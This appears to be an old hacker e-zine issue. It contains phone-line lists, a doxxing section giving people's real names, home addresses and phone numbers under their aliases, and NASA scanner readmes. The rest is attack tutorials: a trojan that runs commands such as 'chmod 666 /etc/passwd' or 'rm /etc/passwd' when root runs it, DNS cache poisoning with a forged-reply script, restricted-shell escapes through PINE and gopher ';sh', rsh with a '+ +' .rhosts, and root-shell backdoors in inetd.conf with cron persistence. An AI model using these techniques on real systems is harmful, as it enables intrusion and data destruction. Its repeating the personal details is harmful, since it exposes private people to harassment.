_always_ BUSY #s (unplugged): 111-11xx, 222-2222, 980xxxxx .. 999xxxxx
-----------------------------------------------------------------------
INTEL PORT:
-----------------------------------------------------------------------
956-4787  Main
434-1565  Registration
202-6934  Demo
-----------------------------------------------------------------------
Dial-Ups
-----------------------------------------------------------------------
281-0201
975-0520  (37)
9270003   TYMUSA
956-3692  the same
956-0699  9600, real Tymnet
9563678   voice
503/9563691  TYM-X25 sync
-----------------------------------------------------------------------
Youth Science Center Linux server
-----------------------------------------------------------------------
Data lines:
  Line 1: 954-0664 (14400, 24h, UUPC only)
       2: 954-0058 (14400, 21:00 - 09:00)
       3: 954-0914 ( 9600, 21:00 - 09:00)
       4: 954-0147 (33600, 24h, PPP only)
       5: 954-0144 (33600, 24h, RAS only)
       6: 954-0445 (33600, 24h, restricted)
Voice: Dmitry Ablov, 9540012

7473355   ASVT dial-up gateway, 2 users: Oleg & Alex
742xxxx   Gate to Iskra2 line. Call for 8-097-2 nodes
913xxxx   Gate to Iskra2 line. Call for 8-097-3 nodes
2324626   Comstar dialup
2329696
9560885   "The Microsoft Network is no longer providing MSN in Russia"
-----------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=-
-----------------------------------------------------------------------
Moscow #s
7473320   Rus  MCI operators in California
7473322   Eng  "connect me to Customer's Service" in Russian
7473321   AT&T operators in New York
7473323
7473324   Sprint Global, Arizona, USA
7473325   Orua, Canada
7473326   Otele Code ?
7473327 National Calling Center, UK 28 7473329 Japan 7473356 Sprint Calling Cards 57 7473359 France service 60 7473361 Italian service 7473363 Chili ? service National Russian #s 8-10 800 4977211 - ( AT&T); 8-10 800 4977222 - ( MCI); 8-10 800 4977255 - ( Sprint) ; 8-10 800 4977220 - (MCI ᪮筠 㦡); 8-10 800 4977233 - (Teleglob); 8-10 800 4977266 - ⠭(BT); 8-10 800 4977277 - ⠭( Mercuri); 8-10 800 4977288 - ; 8-10 800 4977181 - ( KDD); 8-10 800 4974358 - ﭤ( Telecom Finland); 8-10 800 4977032 - 죨 (Belgacom, ᯮ짮- 祪); 8-10 800 4977212 - 죨 ( Belgacom, १ - ); 8-10 800 4977039 - ⠫ (Iritel); 8-10 800 4977353 - ૠ ( Telecom Iriland); 8-10 800 4977156 - ; 8-10 800 4977165 - ; 8-10 800 4977141 - . =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. sIn inf0z part 3 : The CodeZero + Friends sIn are 0fficially property of the CodeZero. ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 
218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 Email : ------------------------------------------------------------------------------- Alias : JeNnYGrRl Real Name : Jennifer Chambers Address : Kansas City, MO 61421 USA Telephone : Email : ------------------------------------------------------------------------------- We got more, but not complete, They can run, but they can never hide, http://www.codez.com/inf0z.html 2. The Codez That NASA Use : so1o w0wie, I got myself some eleet NASA system security juarez...And people have leeched them from me, like lame undernet groups with no skill. ::: LaRCSCAN ::: NAIAD ---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have---------- (readme.larcscan) The LaRCSCAN program is a working prototype rather than a finished product, thus requiring a few explanations. SETTING UP ---------- LaRCSCAN is a combination of fifty script and c-language files. (No need to compile the c code, the scripts will do it ). To set up to run LaRCSCAN create a directory LARCSCAN in the users home directory. Copy LARCSCAN.tar into this directory. Do a tar -xf LARCSCAN.tar. This will create a 'project' directory containing all the script and 'C' files. Next create a directory 'LARCSCAN/data' . In this directory you wil create two files- 'hname1' and 'uname2'. These should be plain ascii text files. The first (hname1) will contain a list of all the target machine host names, one name per line. Example: viper machine2 dumbo (These may also use the longer format i.e. 
'dumbo.larc.nasa.gov').

The second (uname2) should contain a list of standard vendor account names you wish to check. Example:

guest
tutor
4Dgifts
demo
demos
lp

There is an extensive list of these names in the file named 'acctlist'. We normally run 6 to 8 of these each month, rotating through the list. They are used in the 'rsh' attempts, and using too many can make the process extremely slow.

Before running LaRCSCAN, there are several places where code must be changed to reflect the user, host and domain running the scan. The following changes should be made:

FILE         CURRENT TEXT                   REPLACEMENT
----         ------------                   -----------
ftpsc        'jpark@bize'                   your username@your hostname
ftpss        'jpark@bize'                   your username@your hostname
getftp.sh    'jpark@bize'                   your username@your hostname
getftpss.sh  'jpark@bize'                   your username@your hostname
ftpsc        '#local=larc.nasa.gov'         '#local='your complete domain
ftpss        '#local=larc.nasa.gov'         '#local='your complete domain
hostsljc     '#local=larc.nasa.gov'         '#local='your complete domain
rshss        '#local=larc.nasa.gov'         '#local='your complete domain
rshsc        '#local=larc.nasa.gov'         '#local='your complete domain
shownlj      '#local=larc.nasa.gov'         '#local='your complete domain
line.c       'strncmp(pl.hdr,"larc",n)'     substitute the site portion of your
                                            domain name (lerc, arc, jpl, etc.)
                                            for 'larc'

These changes are necessary in order for your results to be accurate.

The C code is compiled (by the script files) using cc with the -o option (the next token is the output file). If this compiler is not used on the scanning machine, you should be able to substitute the appropriate compiler command and option. Compilation occurs from:

exec1.sh
exec2.sh
rshsc
rshss
shownlj

RUNNING LaRCSCAN
----------------

LaRCSCAN can take quite a while (days) to run to completion, so it is recommended that it be run in the background. We do this either with crontab starting it at a specified time/date, or through the use of 'nohup'. The command that starts the process is 'sh tst1.sh' (in the project directory).
The necessary subdirectories and files will be created as needed.

RESULTS
-------

The first report (LARCSCAN/result/result.db) is a summary of the results from each target machine. It starts with the date the scan began and the total number of target hosts. The next line is the column header line, containing the following abbreviations:

HTNAME - hostname
HUK    - host known (is the hostname an active host)
TFTP   - trivial ftp (is the trivial ftp utility active on this host)
FTP    - anonymous ftp (is anonymous ftp active on this host). There can be
         several valid responses in this column:
           No      - anonymous ftp is not active
           Yes_No  - anonymous ftp is active but no password file was captured
           Yes_Yes - anonymous ftp is active and a password file was captured
ALIAS  - were the 'decode' or 'uudecode' aliases present in the aliases file
SDM    - was the 'wiz' password present in the sendmail.cf file
SHADOW - was the captured password file a shadow password file. N/A is used
         when no password file was captured. (This is the only column where
         'Yes' is a desired result.)
+LINE  - indicates a single '+' on a line by itself in the hosts.equiv file

The second report (LARCSCAN/result/result2.db) is a list of all hosts found to have accounts with no password, followed by the unprotected account names. The ACCTS_OFF and OFF columns will be used to represent hosts.equiv entries that are located off-site and target hosts located off-site. Currently these entries are not valid!

The last report (LARCSCAN/result/resultr1.db) contains a list of all file systems exportable to the world.

Any specific questions or problems may be sent via E-mail to j.w.park@larc.nasa.gov.

(readme.naiad)

The NASIRC Automated Inode Anomaly Detector (NAIAD)
---------------------------------------------------

Copyright 1996 Hughes STX Corporation

This software was developed by Hughes STX Corporation for the National Aeronautics and Space Administration under contract NAS5-30440. An unlimited license for use within NASA is granted.
Hughes STX Corporation makes no representation concerning the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind.

Author: Fred Blonder

NAIAD will traverse a specified directory and all its sub-directories, looking for files meeting certain built-in criteria. If no directory is specified, it starts at the current directory. Its purpose is to find evidence of attempted or actual system tampering. The tests performed cannot easily be performed by existing system commands such as "find". NAIAD is intended to be used in conjunction with such programs and with checksumming programs.

The tests NAIAD performs are:

* Check for file names containing unprintable characters. These are sometimes used to hide illicit programs, or the output from them. They are also frequently created by fumble-fingered users, and are not necessarily a sign of a problem. Optionally, naiad will rename the file to something easier to type on a normal keyboard.

* List symbolic links, or just symbolic links to files whose name begins with a period. The exploitation of security holes in some programs involves placing symbolic links into a spool directory. NAIAD will help locate links in unexpected places.

* List old files whose inode has been altered recently. Some malicious programs attempt to hide the fact that they have altered a file by using the "utime" system call to alter the "last modified" time of the file. The inode also contains the "inode changed" time, which is not modifiable by this call; thus a file which has been tampered with to display an old modification time will still have a recent "inode changed" time. Of course, this can also be caused by someone using the "chmod" command.
  There are two parameters associated with this: the "window" is the amount of time by which the modification time and the inode-change time may differ without the file being flagged (default 30 minutes, which can be changed); and the "cutoff", which is how recently the inode must have been changed for the file to be flagged at all (by default, files whose inodes have not been modified in the last week are not shown; this can be changed).

* List device files which are not under the /dev hierarchy, or ordinary files that are.

* List any files or directories whose mtime, atime or ctime are later than the current system time.

* List files which contain user-specified search strings. This is similar to the command:

    find . -exec grep <pattern> '{}' ';' -print

  but a little more efficient, because there isn't a process started for each file, and naiad can be made to search only part of each file.

The output format is:

    MMM mmm iiiiiiiiii xxxxxxxxxxxxx: <pathname>

...where "MMM" is the major device number, "mmm" is the minor device number, "iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment, and <pathname> is the pathname of the file. There may be additional information appended to the line.

You will probably want to run as super-user so that NAIAD can access the entire file system. It is passive, and will not alter anything it finds.

More detailed information may be found in the "naiad.1" file, which is part of the naiad tarfile.

---These Are The *EXACT* Files Taken From The nasa.zip.gz I have---------------

So, looks as if NASA has some pretty neat detection juarez to use. I wouldn't advise anyone to hack any *.nasa.gov system without knowing how to obtain root and having mad skills to counteract these security measures. You have been warned.

so1o.
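Since the tarball itself is not reproduced here, here is the core of NAIAD's checks written out, as an added example (my code, not Hughes STX's, and not a port of the original): the timestamp test with its "window" and "cutoff" parameters, the symlink, device-placement and future-timestamp tests, and a walk that applies them. It relies on the POSIX rule the readme describes, that utime() can rewrite mtime but only the kernel sets ctime, and it demonstrates itself on a scratch directory it builds, where one file has been backdated exactly the way a rootkit does it.

```python
"""NAIAD-style inode anomaly scan: backdated mtimes, stray symlinks,
misplaced device nodes, future timestamps and unprintable names."""
import os
import stat
import tempfile
import time


def unprintable_name(name):
    """True if the name has characters outside printable ASCII (NAIAD test 1)."""
    return any(not 32 <= ord(ch) < 127 for ch in name)


def backdated(mtime, ctime, now, window=30 * 60, cutoff=7 * 24 * 3600):
    """NAIAD's 'old file, recently changed inode' test on raw timestamps.

    utime() can rewrite mtime but never ctime, so a file whose mtime was
    pushed into the past still carries a fresh ctime.  Flag it when the two
    differ by more than `window` and the inode changed within `cutoff`."""
    if now - ctime > cutoff:
        return False              # inode untouched for longer than the cutoff
    return ctime - mtime > window


def misplaced_device(path, st):
    """Device node outside /dev, or a plain file inside it (NAIAD test 4)."""
    is_dev = stat.S_ISCHR(st.st_mode) or stat.S_ISBLK(st.st_mode)
    under_dev = path == "/dev" or path.startswith("/dev/")
    if is_dev and not under_dev:
        return True
    return under_dev and stat.S_ISREG(st.st_mode)


def future_timestamp(st, now):
    """Any of mtime/atime/ctime later than the clock (NAIAD test 5)."""
    return max(st.st_mtime, st.st_atime, st.st_ctime) > now + 1


def scan(root, now=None, window=30 * 60, cutoff=7 * 24 * 3600):
    """Walk `root` without following links; return (kind, path) findings."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if unprintable_name(name):
                findings.append(("unprintable-name", path))
            if stat.S_ISLNK(st.st_mode):
                findings.append(("symlink", path))
            if backdated(st.st_mtime, st.st_ctime, now, window, cutoff):
                findings.append(("backdated-mtime", path))
            if misplaced_device(path, st):
                findings.append(("misplaced-device", path))
            if future_timestamp(st, now):
                findings.append(("future-timestamp", path))
    return findings


def demo():
    """Constructed scenario in a scratch directory: one honest file, one file
    whose mtime is pushed a year back with utime() (the trick NAIAD looks
    for), and a dot-file symlink.  Returns the sorted set of finding kinds."""
    with tempfile.TemporaryDirectory() as root:
        honest = os.path.join(root, "honest.txt")
        replaced = os.path.join(root, "ls")       # pretend a swapped binary
        for p in (honest, replaced):
            with open(p, "w") as f:
                f.write("x\n")
        a_year_ago = time.time() - 365 * 24 * 3600
        os.utime(replaced, (a_year_ago, a_year_ago))   # ctime still updates to now
        os.symlink(honest, os.path.join(root, ".hidden-link"))
        return sorted({kind for kind, _ in scan(root)})


if __name__ == "__main__":
    print(demo())   # ['backdated-mtime', 'symlink']
```

Run scan("/") as root to cover the whole file system, as the readme advises. The cutoff matters in practice: a legitimate chmod or chown also bumps ctime, so on a system that has been up for years the window alone would flag far too much, and restricting attention to inodes changed in the last week is what keeps the report readable.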
3. Rooting From Bin : so1o

This is something I was thinking a lot about the other day. I was on a System V Release 4, I had just performed the chkperm exploit, which only gives bin access (uid=1 and gid=1) to the system, so even though I own all the files in the /bin/ directory, I am still not root. Here is a very, very simple technique I developed for such occasions; this may come in useful one day for someone, somewhere...

Write a program that you can get people to run. You could get hold of the source for a common program, such as su or who or mount (as bin, you own the binaries in /bin and can replace them). Put this line in it somewhere:

    if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks whether the root login is running your program. If so, you can have root execute any shell command you'd like. Two practical notes: getlogin() returns NULL when the process has no login entry (a cron job, say), and strcmp on NULL will crash your trojan in a very visible way, so test for NULL first; and testing the real user id (getuid() == 0) catches root no matter what name is in utmp. Here are some suggestions for the command:

"chmod 666 /etc/passwd"

/etc/passwd is the system's password file. Root owns this file. Normally everyone can read it (the passwords are encrypted) but only root can write to it. Take a look at it and see how it's formatted if you don't know already. This command makes it possible for you to write to the file, i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

By adding yourself to some high-access groups, you can open many doors.

"chmod 666 /usr/lib/uucp/L.sys"

Look for this file on your system if it is on the uucp net. It contains dialups and passwords to other systems on the net, and normally only the uucp administrator can read it. Find out who owns this file and get him to unknowingly execute a program that unlocks it for you.

"rm /etc/passwd"

If you can get root to execute this command, the system's password file will be removed, nobody can log in, and the system will stay that way until the file is restored from backup. This is very destructive and evil, but pointless; if you do want to damage a system, at least use your imagination.

If you are going to go about adding a trojan horse program to the system, there are some rules you should follow.
If the hidden purpose is something major (such as unlocking the user's mbox or deleting all of his files or something), this program shouldn't be a program that people will be running a lot (such as a popular computer game): once people discover that their files are public access, the source of the problem will be discovered quite easily. Save this purpose for a 'test' program (such as a game you're in the process of writing) that you ask individual people to run via mail or by 'chatting' with them. As I said, this 'test' program can bomb or print a phony error message after completing its task, and you will just tell the person "well, I guess it needs more work", wait until they log off, and then read whatever file of theirs you've unlocked.

If your trojan horse program's sole purpose is to catch a specific user running it, such as root or another high-powered user, you can put the code to do so in a program that will be run a lot by various users of the system. Your modification will remain dormant until he runs it.

If you can't find the source to 'star trek' or whatever in C, just learn C and convert something from Pascal. It can't hurt to learn C, as it's a great language. We've just seen what it can do on a UNIX system.

Once you've caught root (i.e. you can now modify the /etc/passwd file), remove the spurious code from your trojan horse program and you'll never be caught.

so1o.

4. DNS Spoofing : so1o

You can now use a new DNS spoofing technique originally developed by johan. I have seen this technique often applied to IRC, and prym was one of the first to use the technique for that purpose.

Here is a basic introduction into the DNS concept.
--------------------------------------------------

DNS stands for Domain Name System (you will also hear "Domain Name Server", and sometimes, wrongly, "Dynamic Name Server").
DNS servers are used so that instead of everyone having to use numeric IPs for their websites and shit, they can use names, and a client can 'look up' a name (eatme.com for example) to get the numeric IP. Basically, a DNS server is a computer running a nameserver daemon, typically listening on UDP port 53.

When a new domain is set up, the domain is registered with the InterNIC. The InterNIC's root and top-level servers then tell anyone who asks which nameservers have authority over the domains registered with it. For example, say 1.2.3.4 wanted to resolve the address for peachie.com and 1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric IP for peachie.com was, so 1.3.3.7 would ask the InterNIC's servers who had authority over peachie.com, and they might reply with ns.peachie.com. So then 1.3.3.7 would ask ns.peachie.com what the numeric IP for peachie.com was. ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com was 4.3.2.1, 1.3.3.7 would pass that on to 1.2.3.4, and the name would be resolved.

DNS servers generally cache addresses that are looked up by their clients. So if 1.2.3.4 were to ask 1.3.3.7 for the address of peachie.com again, 1.3.3.7 would not ask the InterNIC etc.; instead it would take the IP it had resolved earlier and say that the numeric IP for peachie.com is 4.3.2.1.

The funny part is that an old-style DNS server does very little checking when another nameserver replies to its query. Whatever records come back in the reply, whether in the answer, authority or additional section, get cached and handed out to clients later, even records for names the replying server has no authority over. (Newer resolvers refuse to cache records that fall outside the replying server's own zone, its "bailiwick", and that is exactly what kills this trick.) This is why we can spoof using such a technique, but we would need root access to a nameserver first; this is one of the biggest setbacks...

How to spoof your DNS.
----------------------

Let's say we're sitting on ns.peachie.com with root, and we have authority for all of peachie.com. We want to cache our box's address 2.2.2.2 on the remote nameserver ns.eatme.org so that we can connect to eatme.org with the address of trusted.eatme.org.
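Before walking through the exchange, here is what the rogue server's reply looks like on the wire, and what a resolver should do with it, as an added example and not johan's or prym's program: it builds the answer ns.peachie.com sends back for "peachie.com A?" with the two extra records for 2.2.2.2 smuggled into the additional section, parses it the way a resolver does, and then applies the bailiwick rule that drops anything not under the responding server's zone. Names and addresses are the ones used in this section; the transaction ID, TTL and the absence of label compression are my simplifications.

```python
"""Out-of-bailiwick DNS cache poisoning: the forged reply ns.peachie.com
sends, and the bailiwick check a hardened resolver applies before caching."""
import struct

A, PTR, IN = 1, 12, 1          # record types / class we need


def encode_name(name):
    """Wire-format a dotted name (no label compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, off):
    """Read an uncompressed name at `off`; return (name, new offset)."""
    labels = []
    while True:
        n = data[off]
        off += 1
        if n == 0:
            break
        labels.append(data[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def rr(name, rtype, rdata, ttl=3600):
    """One resource record: NAME TYPE CLASS TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, IN, ttl, len(rdata)) + rdata


def a_rdata(ip):
    return bytes(int(o) for o in ip.split("."))


def build_reply(txid, qname, answers, additionals):
    """Header flags 0x8500: QR=1 (response), AA=1 (authoritative), RD=1."""
    hdr = struct.pack("!HHHHHH", txid, 0x8500, 1, len(answers), 0, len(additionals))
    body = encode_name(qname) + struct.pack("!HH", A, IN)
    return hdr + body + b"".join(answers + additionals)


def parse_reply(pkt):
    """Return (qname, [(section, owner, type, value), ...])."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    off += 4                                   # QTYPE, QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            owner, off = decode_name(pkt, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            rdata = pkt[off:off + rdlen]
            off += rdlen
            if rtype == A:
                value = ".".join(str(b) for b in rdata)
            elif rtype == PTR:
                value, _ = decode_name(rdata, 0)
            else:
                value = rdata.hex()
            records.append((section, owner, rtype, value))
    return qname, records


def in_bailiwick(owner, zone):
    """Is `owner` at or below the zone the replying server is authoritative for?"""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def cacheable(records, zone):
    """What a bailiwick-checking resolver keeps from a reply out of `zone`."""
    return [r for r in records if in_bailiwick(r[1], zone)]


def forged_reply():
    """The reply the rogue ns.peachie.com returns to ns.eatme.org's question
    'peachie.com A?': a true answer, plus two unasked-for records that claim
    2.2.2.2 is trusted.eatme.org.  Transaction ID 0x1337 is a placeholder."""
    answers = [rr("peachie.com", A, a_rdata("4.3.2.1"))]
    extras = [rr("2.2.2.2.in-addr.arpa", PTR, encode_name("trusted.eatme.org")),
              rr("trusted.eatme.org", A, a_rdata("2.2.2.2"))]
    return build_reply(0x1337, "peachie.com", answers, extras)


if __name__ == "__main__":
    qname, recs = parse_reply(forged_reply())
    for r in recs:
        print(r)
    print("kept:", [r[1] for r in cacheable(recs, "peachie.com")])
```

An old resolver caches all three records; a bailiwick-checking one keeps only the peachie.com answer, because neither 2.2.2.2.in-addr.arpa nor trusted.eatme.org is something ns.peachie.com is allowed to speak for. No transaction-ID guessing is involved here, which is what makes this variant so easy: the attacker is the authoritative server, so it simply answers the real query.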
We could write a program that listens for DNS queries and replies with false information. Sitting on ns.peachie.com, we look up peachie.com on the nameserver ns.eatme.org. ns.eatme.org asks the InterNIC's servers who has authority for peachie.com, and they reply that ns.peachie.com does. Then ns.eatme.org asks ns.peachie.com what the address for peachie.com is. If we were running a normal DNS it would tell ns.eatme.org that the address for peachie.com is 4.3.2.1, but we aren't. Instead ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is trusted.eatme.org and that the address for trusted.eatme.org is 2.2.2.2.

This exploits the failure to check a few things on the DNS. Basically, ns.eatme.org asked what the numeric IP for peachie.com was, and we told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP of trusted.eatme.org is 2.2.2.2. They asked one question and we responded with two answers to different questions entirely, for names inside their own domain, which our server has no business answering for.

Now we would simply connect to eatme.org from 2.2.2.2. eatme.org would ask ns.eatme.org for the reverse of 2.2.2.2, and in its cache it would find trusted.eatme.org and reply with that. Then it would ask for the address of trusted.eatme.org and get 2.2.2.2 back, so the forward and reverse lookups agree. You would then be connected to eatme.org as trusted.eatme.org; that, in effect, is DNS spoofing. Anything that trusts by hostname, like an .rhosts or hosts.equiv entry for trusted.eatme.org, now lets 2.2.2.2 in.

That's all there is to it; it may be a bit heavy for some people.

so1o

5. FreeNet : TrN

Breaking security on restricted shells and freenets.

What many system administrators fail to realise is that when they set up shells and security on their applications and systems, and generally try to lock users into a freenet menu environment, it is almost impossible to fully examine every program. Many programs allow you to escape to a shell, even in secure mode, especially the older ones.
There is a longstanding bug in the gopher client, used by many freenets, that allows you to start up a gopher server where an entry is created such as ";sh". Following this entry provides a shell. This is the main reason why the original gopher client is no longer in use. A "l;rm -rf *" was just as easy.

In today's world, the biggest problem is that freenets usually allow you to edit files. If this is the case, you have almost a 100% chance of getting into a real shell. What you first have to do is see if you can go through the menu system to edit a file. If you can't, that is cool too. We are going to show you how to get a shell out of PINE. It doesn't matter which version; this works all the way up to 3.96.

Anyway, like I was saying, you should see if you can either a) edit a file, or b) upload a file. I'm almost sure you can do either. So, let's start a little session here. First, you have to edit your .pinerc. If you can't, download it (or get it from the PINE package), make the changes, and re-upload it. What is important is that you edit the feature-list= line, and have it read something similar to this:

feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd

After setting this correctly, go further into the file until you find the editor= line. The comment above it in a stock .pinerc says this is the program invoked by ^_ (Control-Underscore, which is Control-Shift-Dash on a US keyboard) in the composer. Do you get the idea yet? Set the line to read

editor=sh

and then save the file. Now for the fun part. Start up pine and choose Compose Message. Erase all the To/Cc/Attchmnt/Subject headers, and make the message text blank except for the word "sh" (without the quotes) on a single line. After this is done, press the alternate editor hotkey (^_). Pine runs the "editor" with the temporary message file as its argument, so what actually executes is sh on a file whose only line is "sh": the first shell reads that line as a script and starts a second, interactive shell on your terminal. Here is what happens:

To      :
Cc      :
Attchmnt:
Subject :
----- Message Text -----
sh
$

Kinda neat. That little $ is the sign that it all worked.
What you probably want to do is execute some of the standard commands that tell you a little about where you are:

$ uname -a ; uptime ; /sbin/ifconfig -a
SunOS pb 4.1.3_U1 1 sun4m
12:14am  up 47 days, 12:18,  24 users,  load average: 2.71
le0: flags=63 inet 199.227.192.35 netmask ffffff00 broadcast 199.227.192.0
lo0: flags=49 inet 127.0.0.1 netmask ff000000

Then a w ; ps -aux would be nice. It can tell you a little about what is going on, and whether it is safe to do the things you want. You should probably log on late at night, compile slirp if it is only a shell/vt dialin, and then check the system for vulnerabilities, unshadowed passwords, etc.

I've notified my freenet of their problems, but they don't seem to care. Maybe now they will. Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-)

This article by TrN of The CodeZero. I'll have more interesting information on the way. You can get hold of me at http://bluebox.dyn.ml.org:8000, or by e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web page, as it has other security related information. LaterZ.

One other thing to consider: if ports 514 / 512 are open (rshd / rexecd), then you can try creating an .rhosts file in your home directory containing "+ +", then use..

rsh -l loginhere systemhere.com csh -i

...and you will get a shell, with no password asked, from any host rshd will talk to. -- so1o

6. Backdoors Revised : Blk-Majik

Disclaimer: If you do anything mentioned in this article, it is your own fault and any trouble you manage to get into is your own responsibility, not mine. But what am I thinking... like any of you lamers can root a shell :).

gr33tz: A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack, plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for making this document possible and helping me out!

=============================================================================
section 1:
=============================================================================

What is a back door?
Well, kiddies, a backdoor is just a way to remotely get into a shell without being noticed or sometimes logged. This can be done by adding an extra telnet port to the server. I will show you a few ways to set up the port, and also how to keep it up even after the admin finds it. so1o had a section in a back issue with a back door using the inetd.conf file where you had to end all commands with a ";". Well, that annoyed the hell out of me so I have modified his technique.

=============================================================================
section 2:
=============================================================================

What you need :

Basically, you need root on a shell to start (and a Unix based OS). After that, you will need a good editor....say pico or vi. Most of you #shells wh0res need, but lack, this important ingredient....a fucking brain.

=============================================================================
section 3:
=============================================================================

Understanding the technique :

After you checked your head, editor, whoami, etc, you are all set. Ok, this is what you look for:

    /etc/services       This file lets you find a port
    /etc/inetd.conf     This is where the backdoor will be

ok, in the /etc/services file, you will see something like this:

    tcpmux          1/tcp    #TCP Port Service Multiplexer
    tcpmux          1/udp    #TCP Port Service Multiplexer
    compressnet     2/tcp    #Management Utility
    compressnet     2/udp    #Management Utility
    compressnet     3/tcp    #Compression Process
    compressnet     3/udp    #Compression Process

ok, what the fuck is that? ill explain it with this example:

    ftp            21/tcp    #File Transfer [Control]
    ftp            21/udp    #File Transfer [Control]
    [1]           [2]/[3]    #[        4          ]

1: The name of the service of the system.
2: The port that the system uses for the service.
3: The protocol (going to be tcp. You can choose either tcp or udp.)
4: A description of what the service is used for.

Aight, that's the services file...you will need this later.
Now look at the /etc/inetd.conf file. inetd is an Internet daemon that listens for TCP requests and UDP ports and then spawns the program when a connection request is made. It will look like this:

    ftp     stream  tcp     nowait  root    /usr/libexec/tcpd    ftpd -l -A
    telnet  stream  tcp     nowait  root    /usr/libexec/tcpd    telnetd
    shell   stream  tcp     nowait  root    /usr/libexec/tcpd    rshd
    login   stream  tcp     nowait  root    /usr/libexec/tcpd    rlogind -a
    exec    stream  tcp     nowait  root    /usr/libexec/tcpd    rexecd

let me explain it:

    ftp     stream  tcp     nowait  root    /usr/libexec/tcpd    ftpd -l -A
    [1]     [ 2 ]   [3]     [ 4 ]   [ 5 ]   [        6        ]  [    7    ]

1: Name of daemon in the services file. It tells inetd what to look for in /etc/services to see what port to use when connecting.
2: Type of socket connection that the daemon will accept.
3: Protocol field which is always TCP or UDP.
4: How long to delay connection.
5: User to run the daemon as (used with uid/gid permissions etc.)
6: What program will keep the connection.
7: The actual command or daemon.

Ok, so what that does is it makes a port for ftp (port 21, as defined in the services file). It has a stream/tcp connection and doesn't wait for a prompt. The user is of root access and uses /usr/libexec/tcpd (but limited commands). Ok, now u know what the shit is for, next step...

=============================================================================
section 4:
=============================================================================

Installing the backdoor :

Backdoor I : Using /etc/inetd.conf and /etc/services
----------------------------------------------------

method 1 :
----------

ok, now go back to the /etc/services file. Look at it and find a service you think the admin will not notice, and that is not in use. Remember the name of the service. Now, go to the inetd.conf file. Go to a place with all the service names, where the 1 is in the above example. Add your service somewhere so it is hidden within the others. For 2, put the port of the service. 3 is tcp, duh.
4 is nowait. 5 will be root, so u get root access. 6 is going to be /bin/sh or whatever you like. 7 has to be 6 -i.. ex: if 6 is /bin/sh, 7 is /bin/sh -i. here is an example:

    ftp     stream  tcp     nowait  root    /bin/sh    sh -i

Ok, now you have to restart inetd. do this by typing (as root) :

    killall -HUP inetd

Ok, now let's test it. From a different system...

    telnet victum.server.com 21
    Trying 123.456.78.9...
    Connected to comp.com
    Escape character is '^]'.
    bash#
    bash# whoami
    root
    bash#

tip: do NOT use the ftp port...it is just used too often. Pick a service that is not used a lot. It will help you keep the backdoor running.

method 2:
---------

If you are willing, you can add your own service to the services file. This is easy..say your services file is like this:

    netbios-ssn     139/tcp    nbssn
    imap            143/tcp    # imap network mail protocol
    NeWS            144/tcp    news    # Window System
    snmp            161/udp

ok, look at the ports.....see how they skip a few? well let's fill 1 of them up...

    netbios-ssn     139/tcp    nbssn
    suled           142/tcp    suled
    imap            143/tcp    # imap network mail protocol
    NeWS            144/tcp    news    # Window System
    snmp            161/udp

Notice the suled service...that I added to the /etc/services. Ok, now to the /etc/inetd.conf file:

    ftp     stream  tcp     nowait  root    /usr/sbin/tcpd    in.ftpd -l -a
    telnet  stream  tcp     nowait  root    /usr/sbin/tcpd    in.telnetd
    gopher  stream  tcp     nowait  root    /usr/sbin/tcpd    gn

...Here we go!!

    ftp     stream  tcp     nowait  root    /usr/sbin/tcpd    in.ftpd -l -a
    telnet  stream  tcp     nowait  root    /usr/sbin/tcpd    in.telnetd
    gopher  stream  tcp     nowait  root    /usr/sbin/tcpd    gn
    suled   stream  tcp     nowait  root    /bin/sh           sh -i

Ok, now restart inetd like i said how to before... You're all set, telnet localhost and test it!@~#

Backdoor II: Da beauty of CRON
-------------------------------

Ok, cron trojans are good for keeping root if the admin kills the backdoor. Cron is a timed daemon. It consists of hours, minutes, etc. It will make the system automatically issue a command on the shell at a given time of your choice...
Type crontab in the shell. It will tell you how to list, run and remove crons. You will like to look at /var/spool/cron/crontabs/root. This is what the crons will look like:

    0    0    *    *    1    /usr/bin/updatedb
    [1]  [2]  [3]  [4]  [5]  [       6        ]

1: minute, 0-59
2: hour, 0-23
3: day of month, 1-31
4: month of year, 1-12
5: day of week, 0-6
